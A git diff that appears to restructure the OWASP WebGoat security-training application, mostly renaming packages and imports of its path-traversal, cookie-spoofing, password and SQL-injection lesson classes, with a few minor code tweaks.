-import java.util.Arrays;
 import java.util.Base64;
-import java.util.Comparator;
 
 @AllArgsConstructor
 @Getter
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadFix.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java
similarity index 87%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadFix.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java
index f828dbfb1..da7214377 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadFix.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
 import org.springframework.web.bind.annotation.GetMapping;
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInput.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java
similarity index 84%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInput.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java
index 9a892d6b5..ecfcc46fe 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRemoveUserInput.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrieval.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java
similarity index 92%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrieval.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java
index 611798951..247b07425 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileUploadRetrieval.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java
@@ -1,10 +1,10 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.RandomUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.core.io.ClassPathResource;
 import org.springframework.http.HttpStatus;
@@ -51,7 +51,7 @@ public class ProfileUploadRetrieval extends AssignmentEndpoint {
     @PostConstruct
     public void initAssignment() {
         for (int i = 1; i <= 10; i++) {
-            try (InputStream is = new ClassPathResource("images/cats/" + i + ".jpg").getInputStream()) {
+            try (InputStream is = new ClassPathResource("lessons/path_traversal/images/cats/" + i + ".jpg").getInputStream()) {
                 FileCopyUtils.copy(is, new FileOutputStream(new File(catPicturesDirectory, i + ".jpg")));
             } catch (Exception e) {
                 log.error("Unable to copy pictures" + e.getMessage());
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java
similarity index 93%
rename from webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java
rename to src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java
index e119a1f4e..e1ea60fe8 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java
@@ -1,9 +1,9 @@
-package org.owasp.webgoat.path_traversal;
+package org.owasp.webgoat.lessons.path_traversal;
 
 import lombok.SneakyThrows;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
 import org.springframework.util.FileCopyUtils;
diff --git a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswords.java b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
similarity index 90%
rename from webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswords.java
rename to src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
index ec19fb832..872c7c027 100644
--- a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.secure_password;
+package org.owasp.webgoat.lessons.secure_passwords;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
similarity index 96%
rename from webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
index d484ce8e7..ac8ba7f1f 100644
--- a/webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password/SecurePasswordsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.secure_password;
+package org.owasp.webgoat.lessons.secure_passwords;
 
 import com.nulabinc.zxcvbn.Strength;
 import com.nulabinc.zxcvbn.Zxcvbn;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
similarity index 90%
rename from webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java
rename to src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
index 41382a4d0..fa8f1c946 100644
--- a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookie.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.spoofcookie;
+package org.owasp.webgoat.lessons.spoofcookie;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /***
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
similarity index 95%
rename from webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
index 2f7fd4a26..b9af34d24 100644
--- a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/SpoofCookieAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.spoofcookie;
+package org.owasp.webgoat.lessons.spoofcookie;
 
 import java.util.Map;
 
@@ -28,9 +28,9 @@ import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletResponse;
 
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.spoofcookie.encoders.EncDec;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.spoofcookie.encoders.EncDec;
 import org.springframework.web.bind.UnsatisfiedServletRequestParameterException;
 import org.springframework.web.bind.annotation.CookieValue;
 import org.springframework.web.bind.annotation.ExceptionHandler;
diff --git a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
similarity index 98%
rename from webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java
rename to src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
index 71ffc8b3d..8f933db3a 100644
--- a/webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat/spoofcookie/encoders/EncDec.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.spoofcookie.encoders;
+package org.owasp.webgoat.lessons.spoofcookie.encoders;
 
 import java.nio.charset.StandardCharsets;
 import java.util.Base64;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionAdvanced.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
similarity index 89%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionAdvanced.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
index 2b195b6ae..a29241eaf 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionAdvanced.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionAdvanced.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallenge.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java
similarity index 93%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallenge.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java
index 327a1c59e..1acc9f538 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallenge.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallenge.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.util.StringUtils;
 import org.springframework.web.bind.annotation.PutMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallengeLogin.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java
similarity index 89%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallengeLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java
index ac6d45a16..766b8222c 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionChallengeLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionChallengeLogin.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
similarity index 92%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6a.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
index 958686576..819b460fe 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6a.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.sql_injection.introduction.SqlInjectionLesson5a;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.sql_injection.introduction.SqlInjectionLesson5a;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -96,4 +96,4 @@ public class SqlInjectionLesson6a extends AssignmentEndpoint {
             return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query).build();
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6b.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java
similarity index 92%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6b.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java
index 5d78368a9..b8e8cc97b 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionLesson6b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionLesson6b.java
@@ -21,11 +21,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionQuiz.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java
similarity index 94%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java
index 49ec417b8..55255de97 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/advanced/SqlInjectionQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/advanced/SqlInjectionQuiz.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.advanced;
+package org.owasp.webgoat.lessons.sql_injection.advanced;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjection.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
similarity index 89%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjection.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
index 9aed4181f..459079ed6 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjection.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjection.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
similarity index 93%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
index 79a615153..a4b5e94ab 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson10.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson10.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
similarity index 90%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
index 956684721..9bc3a335d 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson2.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson3.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
similarity index 91%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson3.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
index ba99b21d9..eba5c2f98 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson3.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson4.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
similarity index 91%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson4.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
index d94baac79..42ef23b84 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson4.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java
similarity index 91%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java
index 970209122..827900369 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
@@ -63,6 +63,7 @@ public class SqlInjectionLesson5 extends AssignmentEndpoint {
     @PostMapping("/SqlInjection/attack5")
     @ResponseBody
     public AttackResult completed(String query) {
+        createUser();
         return injectableQuery(query);
     }
 
diff --git a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java
similarity index 94%
rename from webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5a.java
rename to src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java
index c16d716d5..c600c6389 100644
--- a/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5a.java
